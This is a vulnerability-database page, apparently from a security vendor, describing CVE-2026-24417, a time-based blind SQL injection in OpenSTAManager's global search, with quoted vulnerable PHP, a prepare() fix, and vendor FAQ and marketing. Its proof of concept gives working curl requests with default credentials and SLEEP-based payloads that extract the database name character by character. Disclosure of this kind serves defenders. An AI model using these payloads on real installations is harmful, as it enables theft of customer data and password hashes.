CVE-2026-24417

CVE-2026-24417 is a high-severity SQL injection vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. No fixed version is listed yet.

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: term (GET)
Affected Endpoint: /ajax_search.php
Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

  1. Entry Point: /ajax_search.php (Line 30-31)

    $term = get('term');
    $term = str_replace('/', '\\/', $term);
    

    The $term parameter undergoes minimal sanitization (only forward slash replacement).

  2. Distribution: /src/AJAX.php::search() (Line 159-161)

    $files = self::find('ajax/search.php');
    array_unshift($files, base_dir().'/ajax_search.php');
    foreach ($files as $file) {
        $module_results = self::getSearchResults($file, $term);
    

    The unsanitized $term is passed to all module-specific search handlers.

  3. Execution: /src/AJAX.php::getSearchResults() (Line 373)

    require $file;
    

    Each module's search.php file is included with $term variable in scope.

  4. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()

All Affected Files (10+ vulnerable instances):

  1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)

    foreach ($fields as $name => $value) {
        $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    }
    $rs = $dbo->fetchArray($query);
    

    Impact: Direct concatenation without prepare(), allows full SQL injection.

  2. /modules/ordini/ajax/search.php - Line 43, 47

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
    
  3. /modules/ddt/ajax/search.php - Line 43, 47

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  4. /modules/fatture/ajax/search.php - Line 45, 49

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  5. /modules/preventivi/ajax/search.php - Line 45, 49

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  6. /modules/anagrafiche/ajax/search.php - Line 62, 107, 162

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  7. /modules/impianti/ajax/search.php - Line 46

    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    

Properly Sanitized (NOT vulnerable):

  • /modules/contratti/ajax/search.php - Uses prepare() correctly
  • /modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s

Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s

Impact

Affected Users: All authenticated users with access to the global search functionality.

  • Complete database exfiltration including customer PII, financial records, business secrets
  • Extraction of password hashes for offline cracking
  • Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files:

  1. /modules/articoli/ajax/search.php - Line 51
  2. /modules/ordini/ajax/search.php - Lines 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lines 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lines 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162
  7. /modules/impianti/ajax/search.php - Line 46

Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.

Affected versions

devcode-it/openstamanager (< 2.9.8)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for CVE-2026-24417 yet.

In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-24417? CVE-2026-24417 is a high-severity SQL injection vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. No fixed version is listed yet. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
  2. Which versions of devcode-it/openstamanager are affected by CVE-2026-24417? devcode-it/openstamanager (composer) versions < 2.9.8 is affected.
  3. Is there a fix for CVE-2026-24417? No fixed version is listed for CVE-2026-24417 yet. Monitor the advisory for updates and apply mitigations in the interim.
  4. Is CVE-2026-24417 exploitable, and should I be worried? Whether CVE-2026-24417 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-24417 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-24417? No fixed version is listed yet. In the interim: Use parameterized queries or prepared statements so user input is always treated as data, never as SQL syntax.

Other vulnerabilities in devcode-it/openstamanager

CVE-2026-35470CVE-2026-35168CVE-2026-29782CVE-2026-28805CVE-2026-27012

Stop the waste.
Protect your environment with Kodem.